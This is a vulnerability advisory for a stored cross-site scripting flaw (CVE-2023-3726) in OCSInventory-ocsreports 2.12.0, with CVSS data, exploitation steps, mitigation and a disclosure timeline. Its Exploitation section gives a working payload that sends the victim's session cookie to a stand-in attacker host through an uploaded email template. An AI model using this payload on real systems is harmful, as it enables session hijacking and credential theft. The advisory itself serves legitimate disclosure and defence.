OCSInventory 2.12.0 - Stored XSS
Summary
| Name | OCSInventory-ocsreports 2.12.0 - Stored cross-site Scripting |
| Code name | |
| Product | OCSInventory |
| Affected versions | Version 2.12.0 |
| State | Private |
| Release date | 2023-08-11 |
Vulnerability
| Kind | Stored cross-site Scripting |
| Rule | |
| Remote | Yes |
| CVSSv3.1 Vector | CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N |
| CVSSv3.1 Base Score | 4.9 |
| Exploit available | Yes |
| CVE ID(s) |
Description
OCSInventory allow stored email template with special characters that lead to a Stored cross-site Scripting.
Vulnerability
A cross-site scripting (XSS) vulnerability has been identified in OCSInventory-ocsreports, which could potentially allow an attacker to steal sensitive data such as session cookies. It is also possible to steal the password hash if the attacker changes the server state to debug, this due to the server in debug mode displaying the hash.This could be exploited if the target is an administrator with a current login session.
Exploitation
To exploit this vulnerability we need to go to the Portal of ocsreports -> Configuration -> Notification -> Customize Template and Upload a HTML file with our payload:
<script> new Image().src="http://ourattacker-pc.com/?cookie="+document.cookie; </script>
Note that only administrators can make changes to the mail template.
Evidence of exploitation
Our security policy
We have reserved the ID CVE-2023-3726 to refer to this issue from now on.
System Information
-
Version: OCSInventory-ocsreports v2.12.0
-
Operating System: Linux
Mitigation
An updated version of OCSInventory-ocsreports is available at the vendor page.
Credits
The vulnerability was discovered by Ronald Hernandez from Fluid Attacks' Offensive Team.
References
Vendor page https://ocsinventory-ng.org/
Timeline
2023-07-17
Vulnerability discovered.
2023-07-17
Vendor contacted.
2023-07-20
Vendor replied acknowledging the report.
2023-07-20
Vendor Confirmed the vulnerability.
2023-08-11
Vulnerability patched.
2023-08-11
Public Disclosure.
